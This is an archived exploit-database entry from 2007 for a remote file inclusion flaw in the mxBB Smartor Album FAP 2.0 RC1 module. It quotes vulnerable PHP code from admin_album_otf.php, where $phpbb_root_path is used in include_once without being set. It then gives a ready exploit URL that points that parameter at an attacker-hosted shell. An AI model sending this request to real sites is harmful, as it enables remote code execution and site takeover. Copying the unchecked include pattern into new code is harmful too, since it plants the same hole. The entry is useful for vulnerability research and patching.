Mx Module Smartor Album FAP 2.0 RC 1 Remote File Inclusion Vuln

2007-04-19T00:00:00
ID 1337DAY-ID-1781
Type zdt
Reporter bd0rk
Modified 2007-04-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Mx Module Smartor Album FAP 2.0 RC 1 Remote File Inclusion Vuln
===============================================================




               ########################################################################

                mxBB Module MX Smartor FAP 2.0 RC1 Remote File Inclusion Vulnerability

               ########################################################################


Class: Remote

Founder: bd0rk


Vulnerable Code in /admin/admin_album_otf.php

---------------------------------------------------------------------------------------------
define( 'IN_PORTAL', 1 );

if ( !empty( $setmodules ) )
{
	$file = basename( __FILE__ );
	$module['Smartor_Album']['Configuration otf'] = 'modules/mx_smartor/admin/' . $file;
	return;
}

$mx_root_path = './../../../';
$module_root_path = "./../";
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require( $mx_root_path . '/admin/pagestart.' . $phpEx );

include_once($phpbb_root_path . 'includes/functions_validate.'.$phpEx);
---------------------------------------------------------------------------------------------

$phpbb_root_path is not declared before include_once

[+]Exploit: http://[target]/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=Shell?




#  0day.today [2018-04-07]  #